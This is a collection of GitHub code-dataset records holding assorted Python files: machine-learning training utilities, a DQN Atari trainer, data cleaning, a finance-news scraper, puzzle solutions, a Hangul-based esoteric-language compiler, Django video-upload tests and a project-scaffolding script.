network.\n\n Arguments:\n X -- data set of examples you would like to label\n parameters -- parameters of the trained model\n\n Returns:\n p -- predictions for the given dataset X\n \"\"\"\n\n m = X.shape[1]\n p = np.zeros((1, m), dtype=np.int)\n\n # Forward propagation\n a3, caches = forward_propagation(X, parameters)\n\n # convert probas to 0/1 predictions\n for i in range(0, a3.shape[1]):\n if a3[0, i] > 0.5:\n p[0, i] = 1\n else:\n p[0, i] = 0\n\n # print results\n\n # print (\"predictions: \" + str(p[0,:]))\n # print (\"true labels: \" + str(y[0,:]))\n print(\"Accuracy: \" + str(np.mean((p[0, :] == y[0, :]))))\n\n return p\n\n\ndef predict_dec(parameters, X):\n \"\"\"\n Used for plotting decision boundary.\n\n Arguments:\n parameters -- python dictionary containing your parameters\n X -- input data of size (m, K)\n\n Returns\n predictions -- vector of predictions of our model (red: 0 / blue: 1)\n \"\"\"\n\n # Predict using forward propagation and a classification threshold of 0.5\n a3, cache = forward_propagation(X, parameters)\n predictions = (a3 > 0.5)\n return predictions\n\n\ndef plot_decision_boundary(model, X, y):\n # Set min and max values and give it some padding\n x_min, x_max = X[0, :].min() - 1, X[0, :].max() + 1\n y_min, y_max = X[1, :].min() - 1, X[1, :].max() + 1\n h = 0.01\n # Generate a grid of points with distance h between them\n xx, yy = np.meshgrid(np.arange(x_min, x_max, h), np.arange(y_min, y_max, h))\n # Predict the function value for the whole grid\n Z = model(np.c_[xx.ravel(), yy.ravel()])\n Z = Z.reshape(xx.shape)\n # Plot the contour and training examples\n plt.contourf(xx, yy, Z, cmap=plt.cm.Spectral)\n plt.ylabel('x2')\n plt.xlabel('x1')\n #plt.scatter(X[0, :], X[1, :], c=y, cmap=plt.cm.Spectral)\n plt.scatter(X[0, :], X[1, :], c=reduce(operator.add, y), cmap=plt.cm.Spectral)\n plt.show()\n\n\ndef load_dataset(is_plot=True):\n np.random.seed(3)\n train_X, train_Y = sklearn.datasets.make_moons(n_samples=300, noise=.2) # 300 #0.2\n # Visualize the data\n if is_plot:\n plt.scatter(train_X[:, 0], train_X[:, 1], c=train_Y, s=40, cmap=plt.cm.Spectral);\n train_X = train_X.T\n train_Y = train_Y.reshape((1, train_Y.shape[0]))\n\n return train_X, train_Y","repo_name":"WZJ2333/CNN_Andrew","sub_path":"opt_utils.py","file_name":"opt_utils.py","file_ext":"py","file_size_in_byte":9610,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"72"} +{"seq_id":"23216835167","text":"import torch\nimport sys\nimport os\nfrom copy import deepcopy\nimport numpy as np\nimport time\n\nfrom NetworkAtari import Atari_2600\nfrom utils import select_action, save, eval_model\nfrom init_atari import init\nfrom optim import optimize_model\n\nfrom ResNet_18_Atari import resnet\n\nuse_cuda = torch.cuda.is_available()\nFloatTensor = torch.cuda.FloatTensor if use_cuda else torch.FloatTensor\nTensor = FloatTensor\n\ndef training_Atari(game_name, model, GAMMA=0.99, EPS_START = 1, EPS_END = 0.01,\n iter_param = 1e4, max_frame = 50000000,\n mem_size = int(1e4), momentum = 0.95):\n \"\"\"\n ** Arguments\n Model Deep Learning architecture Resnet18 (resnet)\n or classic DeepMind model (Atari_2600)\n game_name Name of the game\n BATCH_SIZE Size of the batch\n GAMMA Discount factor\n EPS_START Initial value in epsilon greedy exploration\n EPS_END Final value in epsilon greedy exploration\n iter_END nb of frames over wich epsilon is linearly\n annealed to its final value\n iter_param frequency with which we update target network\n max_frame Maximum number of training frames\n mem_size Size of the Replay memory\n lr Learning rate\n momentum Momentum\n \n This algorithm is used for two different architectures : Resnet and more \n classical CNN like DeepMind models for Atari\n \"\"\"\n\n start = time.time()\n \n if model == resnet:\n mod = 'resnet'\n lr = 2.5e-4\n BATCH_SIZE=64\n save_test = 50\n iter_END = 100000\n \n elif model==Atari_2600:\n mod='dqn'\n lr = 1e-4\n BATCH_SIZE=256\n save_test=200\n iter_END = 1000000\n \n recover = input(\"Do you want to resume a previous training ? (y/n) \").lower()\n controller = False\n while not controller:\n if recover==\"n\":\n #If you don't load a previous training it loads a model with\n #random paramaters\n env, env_no_clipping, nb_actions, optimizer, memory, model_atari = \\\n init(game_name,momentum,lr,model,mem_size,mod)\n controller=True\n counter_iter_param=1\n session=0\n \n elif recover==\"y\":\n env, env_no_clipping, nb_actions, optimizer, memory, _ = \\\n init(game_name,momentum,lr,model,mem_size,mod)\n name = input(\"Please enter the name of the file you want to load: \")\n if os.path.exists(name):\n if use_cuda:\n model_atari = torch.load(name)\n else:\n model_atari=torch.load(name, map_location=lambda storage, \n loc: storage)\n controller=True\n counter_iter_param = int(input(\"\"\"Please enter the number of \n frames viewed in the last session: \"\"\"))\n session = int(input(\"Please enter number session: \"))\n else:\n print(\"This file doesn't exist\")\n \n reward_list = []\n eval_reward_list = []\n model_atari_0 = deepcopy(model_atari)\n eps_threshold = 1\n for i_episode in range(1,int(1e6)):\n\n print((i_episode,game_name,model_atari.name,eps_threshold))\n \n #We reset environment and make appropriate transformation on raw pixel\n state = env.reset()\n state = torch.from_numpy(np.array(state)).float()\n state = state.transpose(0,2).transpose(1,2).unsqueeze(0)\n if use_cuda:\n state = state.cuda()\n\n tot_reward = 0\n step = 0\n ended = done =False\n while (not done) and (not ended):\n #Update of the epsilon\n if counter_iter_param = max_frame)\n step += 1\n done = done or (step >= 18000)\n reward_list.append((counter_iter_param,i_episode,tot_reward))\n \n \n if i_episode%save_test==0 or ended:\n evaluation = eval_model(env_no_clipping,model_atari,nb_actions)\n eval_reward_list.append((counter_iter_param,i_episode,evaluation))\n print(\"Saved\")\n #We save data in different files that can be load after training\n save(eval_reward_list,\"evaluation_model_{}_{}.txt\".format(game_name,model_atari.name))\n save(reward_list,\"current_results_{}_{}.txt\".format(game_name,model_atari.name))\n torch.save(model_atari,\"model_atari_repr{}_{}_{}.pkl\".format(session,game_name,model_atari.name))\n if ended:\n break\n\n \n end = time.time()\n t = end-start\n save(t,\"run_time_{}_{}.txt\".format(game_name,model_atari.name))\n return 'Fin'\n\n\n\n\nif __name__ == '__main__':\n if use_cuda:\n print(\"Using CUDA\")\n else:\n print(\"WARNING: Cuda not available\")\n\n assert len(sys.argv) > 2, \"Please give the name of the game as argument\"\n model = sys.argv[2]\n if model == \"resnet\":\n training_Atari(sys.argv[1], model = resnet)\n elif model == \"dqn\":\n training_Atari(sys.argv[1], model = Atari_2600)\n else:\n assert False, \"Unknown model\"\n \n","repo_name":"deepadawan/Res_DQN","sub_path":"main.py","file_name":"main.py","file_ext":"py","file_size_in_byte":6798,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"72"} +{"seq_id":"6626034023","text":"#Lightning Export dataset cleaning\n\nimport numpy as np\n\n#import the data, and make sure the formatting is correct\n# PLEASE NOTE: the dtype of this array is float64\n# that is to say, each entry is of type float64\ncsv = np.genfromtxt('LightningExport2.csv', delimiter = \",\", usecols=np.arange(0,21), skip_header=1)\n\n#extract the 9 useful columns\ncsv = csv[:, [0, 2, 3, 12, 14, 15, 16, 17, 18]]\nindices = np.argsort = [0,2,1,4,5,6,7,8,3]\ncsv = csv[:, indices]\n#the columns of the csv now represent\n# 0 - MLS number\n# 1 - soldprice (our y)\n# 2 - listprice\n# 3 - bedroom count\n# 4 - bathroom count\n# 5 - sqft of property\n# 6 - age\n# 7 - lot size\n\n#elimnating rows with nan\n#originally, we have 54760 listings\n#after we remove the rows with NaNs, we have 54696 listings\n#this preserves over 99.9% of listings, so it seems like a reasonably sane action to take\ncsv = csv[~np.isnan(csv).any(axis=1)]\n\n#remove duplicates\n#now we have 53,167 listings!\nunique_keys, indices = np.unique(csv[:,0], return_index=True)\ncsv = csv[indices]\n\n#change zip code to categorical - 1-hot\n#we appear to have 621 unique zips!\nzips = csv[:,8]\nunique_zips = np.sort(np.unique(zips))\nnum_zips = np.unique(zips).shape[0]\n\nonehot = np.zeros((zips.shape[0], num_zips))\nfor i in range(zips.shape[0]):\n\tindex = np.where(unique_zips == zips[i])\n\tonehot[i,index] = 1\n\nnp.save(\"nothot\", csv)\n\n#replace last column in the array with 621 columns of one-hot encoding\ncsv = np.delete(csv, 8, axis = 1)\ncsv = np.concatenate((csv, onehot), axis=1)\n\n\n\n\n#save the clean data\n#np.save(\"clean\", csv)\n\n# counter = 1\n# for row in csv:\n# \tprint(counter)\n# \tprint(row)\n# \tcounter +=1","repo_name":"catabia/real_estate_price_prediction","sub_path":"experiments_without_list_price/LEcleaning.py","file_name":"LEcleaning.py","file_ext":"py","file_size_in_byte":1632,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"72"} +{"seq_id":"73715559592","text":"# -*- coding: utf-8 -*-\nimport scrapy\nfrom datetime import datetime\nfrom fagaiwei.settings import session, NewsItemInfo\nfrom fagaiwei.items import FagaiweiItem\nclass ZjzxSpider(scrapy.Spider):\n #新浪财经\n name = 'sinacaijing'\n allowed_domains = ['sina.com.cn']\n start_urls = [\n 'http://finance.sina.com.cn/roll/index.d.html?cid=56995' , #期市要闻\n 'http://roll.finance.sina.com.cn/finance/jj4/index_1.shtml' , #基金新闻\n 'http://finance.sina.com.cn/forex/' , #外汇\n 'http://finance.sina.com.cn/nmetal/' , #黄金\n ]\n\n def parse(self, response):\n url_list = response.xpath('//ul[@data-client=\"scroll\"]/li/a/@href | //ul[@class=\"list_009\"]/li/a/@href ').extract()\n for url in url_list:\n result = session.query(NewsItemInfo).filter_by(url=url, web_id=42).count()\n if result:\n # print(\"{} 存在\".format(url))\n pass\n else:\n yield scrapy.Request(url,callback=self.process_detail,meta={'web':response.url})\n\n def process_detail(self,response):\n if response.xpath('//*[@id=\"artibody\"]'):\n item = FagaiweiItem()\n item['web_id'] = 42\n item['url'] = response.url\n item['title'] = response.xpath('//div[contains(@class,\"main-content\")]/h1/text()').extract_first(default='')\n item['web'] = response.meta.get('web')\n item['keyword'] = ''\n item['webname'] = response.xpath('//a[contains(@class,\"source\")]/text()|//span[contains(@class,\"source\")]/text()').extract_first(default='新浪财经')\n item['pub_time'] = response.xpath('//span[@class=\"date\"]/text()').extract_first(default=datetime.now().strftime(\"%Y-%m-%d %H:%M\")).replace('年','-').replace('月','-').replace('日','')\n content = '\\n'.join(response.xpath('//*[@id=\"artibody\"]/p/text() | \\\n //*[@id=\"artibody\"]//p/span/a/text() | \\\n //*[@id=\"artibody\"]//p/span/text() | \\\n //*[@id=\"artibody\"]/div//p/text()').extract())\n if not content:\n content = '这可能是图片或者文件,打开查看!'\n item['content'] = content.replace('\\u3000','').replace('\\xa0','').replace('\\t\\t\\t\\n','').replace('\\n\\n','')\n yield item","repo_name":"KKtoNN/python_spider","sub_path":"fagaiwei/fagaiwei/spiders/42sinacaijing.py","file_name":"42sinacaijing.py","file_ext":"py","file_size_in_byte":2447,"program_lang":"python","lang":"en","doc_type":"code","stars":3,"dataset":"github-code","pt":"72"} +{"seq_id":"24483814230","text":"print(\"starting\")\r\n\r\nsumOfPals = 0\r\n\r\ndef inBinary(x):\r\n largestPower = 0\r\n binaryText = \"\"\r\n currentNum=x\r\n while x>=2**(largestPower+1):\r\n largestPower +=1\r\n for i in range(largestPower,-1,-1):\r\n if 2**i<=currentNum:\r\n binaryText += \"1\"\r\n currentNum -=2**i\r\n else:\r\n binaryText += \"0\"\r\n return binaryText\r\n\r\ndef isPal(x):\r\n l = len(x)-1\r\n for i in range(0,len(x)):\r\n if i >= l-i:\r\n break\r\n if x[i] != x[l-i]:\r\n return False\r\n return True\r\n\r\nfor i in range(1,1000001,2):\r\n print(i)\r\n if isPal(str(i)) and isPal(inBinary(i)):\r\n sumOfPals += i\r\n\r\nprint(sumOfPals)\r\n\r\ninput(\"press Something\")\r\n","repo_name":"alexandrepoulin/ProjectEulerInPython","sub_path":"problems/problem 36.py","file_name":"problem 36.py","file_ext":"py","file_size_in_byte":722,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"72"} +{"seq_id":"18596004281","text":"import logging\n\nfrom lib.termcolor import colored\n\n\n# git://gist.github.com/1238935.git\nclass Logger(object):\n def __init__(self, name):\n self.color_map = {'debug': {'color': 'grey', 'attrs': ['bold']},\n 'info': {'color': 'white'},\n 'warn': {'color': 'yellow', 'attrs': ['bold']},\n 'error': {'color': 'red'},\n 'fatal': {'color': 'red', 'attrs': ['bold']},\n }\n self.logger = logging.getLogger(name)\n self.logger.setLevel(logging.INFO)\n self.stdout = logging.StreamHandler()\n self.stdout.setLevel(logging.INFO)\n self.stdout.setFormatter(logging.Formatter('%(asctime)s [%(levelname)s] %(message)s', '%Y-%m-%d %H:%M:%S'))\n self.logger.addHandler(self.stdout)\n\n def __getattr__(self, status, attrs=[]):\n if status in ('debug', 'info', 'warn', 'error', 'fatal'):\n return lambda msg, *args: getattr(self.logger, status)(\n colored(msg, **self.color_map[status]), *args)\n","repo_name":"knmkr/dbsnp-pg","sub_path":"script/python/log.py","file_name":"log.py","file_ext":"py","file_size_in_byte":1059,"program_lang":"python","lang":"en","doc_type":"code","stars":9,"dataset":"github-code","pt":"72"} +{"seq_id":"41458749969","text":"#\n# @lc app=leetcode id=728 lang=python3\n#\n# [728] Self Dividing Numbers\n#\n\n# @lc code=start\nclass Solution:\n def selfDividingNumbers(self, left: int, right: int) -> List[int]:\n result = []\n for i in range(left, right+1):\n flag = True\n str_i = str(i)\n for j in str_i:\n num_j = int(j)\n if num_j == 0 or i % num_j != 0:\n flag = False\n break\n if flag:\n result.append(i)\n\n return result\n\n\n# @lc code=end\n","repo_name":"HOZH/leetCode","sub_path":"leetCodePython2023/728.self-dividing-numbers.py","file_name":"728.self-dividing-numbers.py","file_ext":"py","file_size_in_byte":551,"program_lang":"python","lang":"en","doc_type":"code","stars":2,"dataset":"github-code","pt":"72"} +{"seq_id":"75025161191","text":"#Still working with files \r\n\r\nwith open(\"life-expectancy.csv\") as world_data:\r\n world_data.readline()\r\n the_life_exp_range = []\r\n country_name = []\r\n year_value = []\r\n \r\n for i in world_data:\r\n i = i.strip()\r\n world_h = i.split(\",\")\r\n \r\n the_life_exp_range.append(world_h)\r\n \r\n max_value = -1\r\n max_vvalue_2 = -1\r\n max_country = ''\r\n max_year = ''\r\n min_value = float(world_h[3])\r\n min_value_2 = float(world_h[3])\r\n min_country = ''\r\n min_year = ''\r\n year_to_check = int(input('Enter the year of interest? '))\r\n \r\n average_list = []\r\n maximum_year = ''\r\n maximum_country = ''\r\n maximum_value = -1\r\n minimum_value = float(world_h[3])\r\n minimum_country = ''\r\n\r\n for exp_values in the_life_exp_range:\r\n country_name = exp_values[0]\r\n country_code = exp_values[1]\r\n country_year = int(exp_values[2])\r\n country_value = float(exp_values[3])\r\n \r\n if country_value > max_value:\r\n max_value = country_value\r\n max_country = country_name\r\n max_year = country_year\r\n \r\n elif country_value < min_value:\r\n min_value = country_value\r\n min_country = country_name\r\n min_year = country_year\r\n \r\n elif year_to_check == country_year:\r\n average_list.append(country_value)\r\n for numbers in average_list:\r\n \r\n length = len(country_value)\r\n total = sum(country_value)\r\n average = total / length\r\n \r\n if country_value > maximum_value:\r\n maximum_value = country_value\r\n maximum_country = country_name\r\n else:\r\n if country_value < minimum_value:\r\n minimum_value = country_value\r\n minimum_country = country_name\r\n \r\n \r\n \r\nprint(\"The Overall max life expectany is: {} from {}, in {}. \".format(max_value, max_country, max_year))\r\nprint()\r\nprint(\"The Overall min life expectany is: {} from {}, in {}. \\n\".format(min_value, min_country, min_year))\r\nprint(\"For the year {}\".format(year_to_check))\r\nprint(\"The average life expentency accross all countries was {:,.2f}\".format(average))\r\nprint(\"The max life expetency was in {} with {:,.2f}\".format(maximum_country, maximum_value))\r\nprint(\"The min life expetency was in {} with {}\".format(minimum_country, minimum_value))\r\nprint()\r\n\r\n\r\n","repo_name":"code-lova/BYU-Python-programming","sub_path":"programming_building_blocks/week11/stretch.py","file_name":"stretch.py","file_ext":"py","file_size_in_byte":2534,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"72"} +{"seq_id":"19505181150","text":"# coding: utf-8\n\nimport io\nimport re\nimport sys\n\nimport template\n\n\n# noinspection PyShadowingBuiltins\ndef compile(source, out_file, newline_in=(u'\\r\\n', u'\\n', u'\\r'),\n naive_border=False, nop_character=u'ㅇ',\n newline_out=u'\\n', nop_pattern=(\n ('nop_ignored', 'nop_ignored_v', 'nop_ignored'),\n ('nop_ignored_h', 'nop', 'nop_ignored_h'),\n ('nop_ignored', 'nop_ignored_v', 'nop_ignored'),\n ), remove_trailing_newline=True,\n remove_leading_newline=False):\n re_splitlines = re.compile(u'|'.join(\n re.escape(s)\n for s in reversed(sorted(newline_in, key=len))\n ))\n lines = re_splitlines.split(source)\n\n if remove_trailing_newline == -1:\n remove_trailing_newline = len(lines)\n for __ in range(remove_trailing_newline):\n if not lines or lines[-1]:\n break\n lines.pop()\n\n if remove_leading_newline == -1:\n remove_leading_newline = len(lines)\n offset = 0\n for __ in range(remove_leading_newline):\n if len(lines) <= offset or lines[offset]:\n break\n offset += 1\n if offset:\n lines = lines[offset:]\n\n height = len(lines)\n width = max(len(line) for line in lines) if lines else 0\n\n left_end = [0] * height\n right_end = [len(line) for line in lines]\n top_end = [height] * width\n bottom_end = [0] * width\n\n for r in range(height):\n for c in range(len(lines[r])):\n top_end[c] = min(top_end[c], r)\n bottom_end[c] = r\n\n for c in range(width):\n if top_end[c] > bottom_end[c]:\n bottom_end[c] = top_end[c]\n\n # templates\n border_intersection = template.template_border_intersection\n if naive_border:\n border_top = template.template_border_top_naive\n border_left = template.template_border_left_naive\n else:\n border_top = template.template_border_top\n border_left = template.template_border_left\n\n # TODO: XXX\n nop = [\n [getattr(template, 'template_' + s) for s in r]\n for r in nop_pattern\n ]\n\n hangul_templates = template.hangul_templates\n\n # top border\n for r_t in range(len(border_intersection)):\n translate_table = {\n 0x3147: ord(nop_character), # ord(u'ㅇ') == 0x3147\n }\n out_file.write(border_intersection[r_t].translate(translate_table))\n for c in range(width):\n out_file.write(border_top[r_t].translate(translate_table))\n out_file.write(newline_out)\n\n for r, line in enumerate(lines):\n for r_t in range(len(border_left)):\n translate_table = {\n 0x3147: ord(nop_character), # ord(u'ㅇ') == 0x3147\n }\n out_file.write(border_left[r_t].translate(translate_table))\n for c in range(width):\n translate_table = {\n 0x3147: ord(nop_character), # ord(u'ㅇ') == 0x3147\n }\n if c >= len(line) or not (u'\\uAC00' <= line[c] <= u'\\uD7A3'):\n cell_char = None\n\n left_over = c < left_end[r]\n right_over = c >= right_end[r]\n top_over = r < top_end[c]\n bottom_over = r >= bottom_end[c]\n\n # XXX\n cell_template = nop[1 - top_over + bottom_over][1 - left_over + right_over]\n else:\n cell_char = line[c]\n code_point = ord(cell_char)\n vowel = (code_point - 0xAC00) // 28 % 21\n consonants = code_point - vowel * 28\n\n translate_table.update({\n 0xCC28: consonants, # ord(u'차') == 0xCC28\n 0xCC98: consonants + 112, # ord(u'처') == 0xCC98\n 0xCD08: consonants + 224, # ord(u'초') == 0xCD08\n 0xCD94: consonants + 364, # ord(u'추') == 0xCD94\n })\n\n cell_template = hangul_templates[vowel]\n\n out_file.write(cell_template[r_t].translate(translate_table))\n out_file.write(newline_out)\n\n\ndef main(filename_in, filename_out):\n with io.open(filename_in, 'r', encoding='utf-8', newline=u'') as file_in:\n source = file_in.read()\n\n with io.open(filename_out, 'w', encoding='utf-8', newline=u'') as file_out:\n compile(source, file_out)\n\n\nif __name__ == '__main__':\n main(*sys.argv[1:])\n","repo_name":"Sait2000/jeoheui","sub_path":"compiler.py","file_name":"compiler.py","file_ext":"py","file_size_in_byte":4500,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"72"} +{"seq_id":"131803749","text":"import uuid\nfrom ffmpy import FFRuntimeError\nfrom unittest import mock\nfrom django.urls import reverse\n\nimport cars.settings\nfrom cars.core.constants import AppPlatform\nfrom cars.core.mds.wrapper import MDSDocumentsWrapper\nfrom cars.django.tests import CarsharingAPITestCase\nfrom cars.users.factories.user import UserFactory\nfrom cars.users.factories.user_documents import UserDocumentPhotoFactory\nfrom cars.users.models.user_documents import UserDocumentBackgroundVideo\nfrom cars.users.models.app_install import AppInstall\n\n\nclass FFmpegMock(object):\n\n def __init__(self, inputs, outputs):\n self.inputs = inputs\n self.outputs = outputs\n\n def run(self, stdout, stderr):\n '''Modifies first input's content and writes it to outputs.'''\n with open(next(iter(self.inputs.keys())), 'rb') as infile:\n modified_data = b'converted_' + infile.read()\n for outfile_name in self.outputs:\n with open(outfile_name, 'wb') as outfile:\n outfile.write(modified_data)\n\n\ndef make_ffprobe_mock(return_format):\n\n class FFProbeMock(object):\n\n def __init__(self, name):\n video_mock = mock.MagicMock(codec_name=return_format)\n self.video = [video_mock]\n\n return FFProbeMock\n\n\nclass UserDocumentBackgroundVideoUploadTestCase(CarsharingAPITestCase):\n\n def setUp(self):\n user_uid = cars.settings.YAUTH_TEST_USER['login']\n self.user = UserFactory.create(uid=user_uid, username=user_uid)\n self.app_install = AppInstall.objects.get(user=self.user)\n self.photo = UserDocumentPhotoFactory.create(document__user=self.user)\n self.mds_client = MDSDocumentsWrapper.from_settings()\n # no convertions for common tests\n self.set_platform(AppPlatform.IOS.value)\n\n def set_platform(self, platform):\n self.app_install.platform = platform\n self.app_install.save()\n\n def get_url(self, photo):\n return reverse(\n 'drive:user-document-photo-background-video',\n kwargs={\n 'document_id': photo.document.id,\n 'photo_id': photo.id,\n },\n )\n\n def upload(self, data, content_type='video/mp4'):\n url = self.get_url(self.photo)\n response = self.client.put(url, data=data, content_type=content_type)\n return response\n\n def test_ok(self):\n response = self.upload(b'test')\n self.assert_response_ok(response)\n video = UserDocumentBackgroundVideo.objects.get(photo=self.photo)\n mds_response = self.mds_client.get_user_document_background_video(video)\n self.assertEqual(mds_response['Body'].read(), b'test')\n\n def test_different_content_type(self):\n self.upload(b'test', content_type='video/webm')\n video = UserDocumentBackgroundVideo.objects.get(photo=self.photo)\n self.assertEqual(video.mime_type, 'video/webm')\n\n def test_no_data(self):\n response = self.upload(None)\n self.assert_response_bad_request(response)\n\n def test_other_user(self):\n user = UserFactory.create()\n photo = UserDocumentPhotoFactory.create(document__user=user)\n url = self.get_url(photo)\n response = self.client.put(url, data=b'test', content_type='video/mp4')\n self.assert_response_not_found(response)\n\n @mock.patch('ffprobe3.FFProbe')\n @mock.patch('ffmpy.FFmpeg')\n def test_conversion_not_needed_platform(self, ffmpy_mock, ffprobe_mock):\n '''Check that if platform is iOS, no ffmpeg-conversion is run.'''\n self.set_platform(AppPlatform.IOS.value)\n response = self.upload(b'video_content_0')\n self.assert_response_ok(response)\n self.assertFalse(ffmpy_mock.called)\n self.assertFalse(ffprobe_mock.called)\n\n video = UserDocumentBackgroundVideo.objects.get(photo=self.photo)\n mds_response = self.mds_client.get_user_document_background_video(video)\n self.assertEqual(mds_response['Body'].read(), b'video_content_0')\n\n @mock.patch('ffprobe3.FFProbe')\n @mock.patch('ffmpy.FFmpeg')\n def test_conversion_not_needed_format(self, ffmpy_mock, ffprobe_mock):\n '''Check that if ffprobe returns h264, no ffmpeg-conversion is run.'''\n ffprobe_mock.side_effect = make_ffprobe_mock('h264')\n\n self.set_platform(AppPlatform.ANDROID.value)\n response = self.upload(b'video_content_0')\n self.assert_response_ok(response)\n self.assertTrue(ffprobe_mock.called)\n self.assertFalse(ffmpy_mock.called)\n\n video = UserDocumentBackgroundVideo.objects.get(photo=self.photo)\n mds_response = self.mds_client.get_user_document_background_video(video)\n self.assertEqual(mds_response['Body'].read(), b'video_content_0')\n\n @mock.patch('ffprobe3.FFProbe')\n @mock.patch('ffmpy.FFmpeg')\n def test_conversion_needed(self, ffmpy_mock, ffprobe_mock):\n '''Check that if platform is Android, video is being converted with ffmpeg.'''\n ffprobe_mock.side_effect = make_ffprobe_mock('mpeg4')\n ffmpy_mock.side_effect = FFmpegMock\n self.set_platform(AppPlatform.ANDROID.value)\n response = self.upload(b'video_content_1')\n self.assert_response_ok(response)\n\n video = UserDocumentBackgroundVideo.objects.get(photo=self.photo)\n mds_response = self.mds_client.get_user_document_background_video(video)\n self.assertEqual(mds_response['Body'].read(), b'converted_video_content_1')\n\n @mock.patch('ffprobe3.FFProbe')\n @mock.patch('ffmpy.FFmpeg')\n def test_conversion_fails(self, ffmpy_mock, ffprobe_mock):\n '''Check that if ffmpeg run fails, unconverted video is uploaded to mds.'''\n ffprobe_mock.side_effect = make_ffprobe_mock('mpeg4')\n ffmpy_mock.side_effect = FFRuntimeError('', 42,\n b'', b'')\n self.set_platform(AppPlatform.ANDROID.value)\n response = self.upload(b'video_content_2')\n self.assert_response_ok(response)\n\n video = UserDocumentBackgroundVideo.objects.get(photo=self.photo)\n mds_response = self.mds_client.get_user_document_background_video(video)\n self.assertEqual(mds_response['Body'].read(), b'video_content_2')\n","repo_name":"Alexander-Berg/2022-test-examples-3","sub_path":"drive/tests/test_video_upload.py","file_name":"test_video_upload.py","file_ext":"py","file_size_in_byte":6284,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"72"} +{"seq_id":"15191478229","text":"import heapq\r\n\r\nK = int(input())\r\nadj = [dict() for i in range(K)]\r\nfor i in range(1, K):\r\n adj[i] = dict()\r\n adj[i][(i+1)%K] = 1\r\n adj[i][(i*10)%K] = 0\r\n\r\ndef dijkstra(adj):\r\n q = []# p q\r\n d = dict()# min cost from start\r\n p = dict()# parent node\r\n n = len(adj)# num of node\r\n\r\n for i in range(n):\r\n d[i] = float('inf')\r\n\r\n start_id = 1\r\n d[start_id] = 0\r\n heapq.heappush(q, (0, start_id))\r\n S = set()\r\n\r\n while len(S) != n:\r\n dist, node_id = heapq.heappop(q)\r\n S.add(node_id)\r\n for u, c in adj[node_id].items():\r\n if c + d[node_id] < d[u]:\r\n d[u] = c + d[node_id]\r\n heapq.heappush(q, (d[u], u))\r\n\r\n return d\r\n\r\nd = dijkstra(adj)\r\nprint(d[0]+1)","repo_name":"Kawser-nerd/CLCDSA","sub_path":"Source Codes/AtCoder/arc084/B/1995966.py","file_name":"1995966.py","file_ext":"py","file_size_in_byte":691,"program_lang":"python","lang":"en","doc_type":"code","stars":17,"dataset":"github-code","pt":"72"} +{"seq_id":"36969446536","text":"\"\"\"\nMake a project directory with associated setup\n\"\"\"\n\nimport argparse\nfrom copy import deepcopy\nimport errno\nimport frontmatter\nfrom functools import wraps\nimport inspect\nfrom licenses import LICENSES\nimport logging\nimport os\nfrom pprint import pformat\nimport re\nimport requests\nimport shutil\nfrom string import Formatter\nimport subprocess\nimport sys\nimport traceback\n\n\nDEFAULT_LOG_LEVEL = logging.INFO\nPOSITIONAL_ARGUMENTS = sorted([\n ['-l', '--loglevel', logging.getLevelName(DEFAULT_LOG_LEVEL),\n 'desired logging level (' +\n 'case-insensitive string: DEBUG, INFO, WARNING, or ERROR'],\n ['-v', '--verbose', False, 'verbose output (logging level == INFO)'],\n ['-w', '--veryverbose', False,\n 'very verbose output (logging level == DEBUG)'],\n ['-c', '--create', False, 'create directory at indicated path'],\n ['-p', '--pyvenv', False, 'create a python virtual environment'],\n ['-n', '--pyversion', '3', 'version of python to use in virtual '\n 'environment'],\n ['-g', '--git', False, 'create a new git repository'],\n ['-s', '--script', False, 'set up with a python script'],\n ['-k', '--package', False, 'set up as a python package'],\n ['-r', '--readme', False, 'add a readme file template'],\n ['-q', '--quiet', False, 'suppress output (logging level == CRITICAL)'],\n ['-x', '--license', 'agpl-3.0', 'license to use (\"none\" is an option)'],\n ['-kv', '--pkgversion', '0.1', 'PEP440 version number to use in setup.py'],\n ['-kd', '--pkgdescription', 'change me', 'description to use in setup.py'],\n ['-kh', '--pkghomepage', 'http://change.me', 'home page to use in '\n 'setup.py'],\n ['-ka', '--pkgauthor', 'Change Me', 'user name to use in setup.py'],\n ['-ke', '--pkgemail', 'change@me.org', 'email address to use in setup.py'],\n ['-cs', '--classdevstatus', '1 - Planning', 'development status '\n 'classifier to use in '\n 'setup.py'],\n ['-ca', '--classaudience', 'Developers', 'intended audience classifier '\n 'to use in setup.py'],\n ['-ct', '--classtopic', 'Change Me', 'topic classifier to use in '\n 'setup.py'],\n ['-kk', '--pkgkeywords', '\"change me\", \"please change me', 'keywords to '\n 'use in '\n 'setup.py']\n])\ntemplate_dir = os.path.join(os.path.dirname(os.path.realpath(__file__)),\n 'templates')\nGITIGNORE_FILE = os.path.join(template_dir, 'gitignore.txt')\nTEMPLATES = {\n 'script-2': os.path.join(template_dir, 'script_template_2.py'),\n 'script-3': os.path.join(template_dir, 'script_template_3.py'),\n 'package-3': os.path.join(template_dir, 'package_template_3.py'),\n 'readme': os.path.join(template_dir, 'README.md'),\n 'requirements': os.path.join(template_dir, 'requirements_dev.txt'),\n 'setup': os.path.join(template_dir, 'setup_template.py'),\n 'setup_config': os.path.join(template_dir, 'setup.cfg'),\n 'manifest': os.path.join(template_dir, 'MANIFEST.in'),\n 'test_template3': os.path.join(template_dir, 'test_template3.py')\n}\nTEMPLATE_RENAMES = {\n 'setup_template.py': 'setup.py'\n}\nPACKAGE_SUBDIRECTORIES = ['scripts', 'tests', 'data']\nLICENSE_FIXES = {\n 'cal': {\n 'prefix': ('https://raw.githubusercontent.com/github/'\n 'choosealicense.com/gh-pages/_licenses/'),\n 'suffix': '.txt'\n }\n}\nDEFAULT_DEPENDENCIES = [\n 'airtight',\n 'better_exceptions',\n 'coverage',\n 'nose'\n]\n\n\ndef arglogger(func):\n \"\"\"\n decorator to log argument calls to functions\n \"\"\"\n @wraps(func)\n def inner(*args, **kwargs):\n logger = logging.getLogger(func.__name__)\n logger.debug(\"called with arguments: %s, %s\" % (args, kwargs))\n return func(*args, **kwargs)\n return inner\n\n\n@arglogger\ndef main(args):\n 